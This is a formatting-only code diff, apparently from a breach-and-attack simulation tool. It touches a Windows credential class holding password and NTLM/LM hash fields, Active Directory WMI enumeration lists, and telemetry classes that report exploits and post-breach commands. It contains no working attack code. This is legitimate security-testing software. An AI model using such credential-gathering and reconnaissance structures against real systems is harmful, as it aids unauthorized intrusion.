@ -10,8 +10,8 @@ class WindowsCredentials:
def to_dict(self) -> Dict:
return {
"username": self.username,
"password": self.password,
"ntlm_hash": self.ntlm_hash,
"lm_hash": self.lm_hash,
"username":self.username,
"password":self.password,
"ntlm_hash":self.ntlm_hash,
"lm_hash":self.lm_hash,
}

View File

@ -17,7 +17,7 @@ WMI_CLASSES = {
# monkey should run as *** SYSTEM *** !!!
#
WMI_LDAP_CLASSES = {
"ds_user": (
"ds_user":(
"DS_sAMAccountName",
"DS_userPrincipalName",
"DS_sAMAccountType",
@ -36,7 +36,7 @@ WMI_LDAP_CLASSES = {
"DS_logonCount",
"DS_accountExpires",
),
"ds_group": (
"ds_group":(
"DS_whenChanged",
"DS_whenCreated",
"DS_sAMAccountName",
@ -52,7 +52,7 @@ WMI_LDAP_CLASSES = {
"DS_distinguishedName",
"ADSIPath",
),
"ds_computer": (
"ds_computer":(
"DS_dNSHostName",
"ADSIPath",
"DS_accountExpires",

View File

@ -44,7 +44,8 @@ class WindowsSystemSingleton(_SystemSingleton):
if not handle:
LOG.error(
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error
"Cannot acquire system singleton %r, unknown error %d", self._mutex_name,
last_error
)
return False
if winerror.ERROR_ALREADY_EXISTS == last_error:

View File

@ -18,4 +18,4 @@ class AttackTelem(BaseTelem):
telem_category = TelemCategoryEnum.ATTACK
def get_data(self):
return {"status": self.status.value, "technique": self.technique}
return {"status":self.status.value, "technique":self.technique}

View File

@ -15,5 +15,5 @@ class T1005Telem(AttackTelem):
def get_data(self):
data = super(T1005Telem, self).get_data()
data.update({"gathered_data_type": self.gathered_data_type, "info": self.info})
data.update({"gathered_data_type":self.gathered_data_type, "info":self.info})
return data

View File

@ -3,7 +3,8 @@ from infection_monkey.telemetry.attack.usage_telem import AttackTelem
class T1064Telem(AttackTelem):
def __init__(self, status, usage):
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
# techniques
"""
T1064 telemetry.
:param status: ScanStatus of technique
@ -14,5 +15,5 @@ class T1064Telem(AttackTelem):
def get_data(self):
data = super(T1064Telem, self).get_data()
data.update({"usage": self.usage})
data.update({"usage":self.usage})
return data

View File

@ -17,5 +17,5 @@ class T1105Telem(AttackTelem):
def get_data(self):
data = super(T1105Telem, self).get_data()
data.update({"filename": self.filename, "src": self.src, "dst": self.dst})
data.update({"filename":self.filename, "src":self.src, "dst":self.dst})
return data

View File

@ -13,5 +13,5 @@ class T1107Telem(AttackTelem):
def get_data(self):
data = super(T1107Telem, self).get_data()
data.update({"path": self.path})
data.update({"path":self.path})
return data

View File

@ -5,7 +5,8 @@ __author__ = "itay.mizeretz"
class T1197Telem(VictimHostTelem):
def __init__(self, status, machine, usage):
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem techniques
# TODO: rename parameter "usage" to avoid confusion with parameter "usage" in UsageTelem
# techniques
"""
T1197 telemetry.
:param status: ScanStatus of technique
@ -17,5 +18,5 @@ class T1197Telem(VictimHostTelem):
def get_data(self):
data = super(T1197Telem, self).get_data()
data.update({"usage": self.usage})
data.update({"usage":self.usage})
return data

View File

@ -14,5 +14,5 @@ class T1222Telem(VictimHostTelem):
def get_data(self):
data = super(T1222Telem, self).get_data()
data.update({"command": self.command})
data.update({"command":self.command})
return data

View File

@ -13,5 +13,5 @@ class UsageTelem(AttackTelem):
def get_data(self):
data = super(UsageTelem, self).get_data()
data.update({"usage": self.usage})
data.update({"usage":self.usage})
return data

View File

@ -13,9 +13,9 @@ class VictimHostTelem(AttackTelem):
:param machine: VictimHost obj from model/host.py
"""
super(VictimHostTelem, self).__init__(technique, status)
self.machine = {"domain_name": machine.domain_name, "ip_addr": machine.ip_addr}
self.machine = {"domain_name":machine.domain_name, "ip_addr":machine.ip_addr}
def get_data(self):
data = super(VictimHostTelem, self).get_data()
data.update({"machine": self.machine})
data.update({"machine":self.machine})
return data

View File

@ -9,6 +9,7 @@ LOGGED_DATA_LENGTH = 300 # How many characters of telemetry data will be logged
__author__ = "itay.mizeretz"
# TODO: Rework the interface for telemetry; this class has too many responsibilities
# (i.e. too many reasons to change):
#

View File

@ -19,9 +19,9 @@ class ExploitTelem(BaseTelem):
def get_data(self):
return {
"result": self.result,
"machine": self.exploiter.host.__dict__,
"exploiter": self.exploiter.__class__.__name__,
"info": self.exploiter.exploit_info,
"attempts": self.exploiter.exploit_attempts,
"result":self.result,
"machine":self.exploiter.host.__dict__,
"exploiter":self.exploiter.__class__.__name__,
"info":self.exploiter.exploit_info,
"attempts":self.exploiter.exploit_attempts,
}

View File

@ -22,11 +22,11 @@ class PostBreachTelem(BaseTelem):
def get_data(self):
return {
"command": self.pba.command,
"result": self.result,
"name": self.pba.name,
"hostname": self.hostname,
"ip": self.ip,
"command":self.pba.command,
"result":self.result,
"name":self.pba.name,
"hostname":self.hostname,
"ip":self.ip,
}
@staticmethod

View File

@ -16,4 +16,4 @@ class ScanTelem(BaseTelem):
telem_category = TelemCategoryEnum.SCAN
def get_data(self):
return {"machine": self.machine.as_dict(), "service_count": len(self.machine.services)}
return {"machine":self.machine.as_dict(), "service_count":len(self.machine.services)}

Some files were not shown because too many files have changed in this diff Show More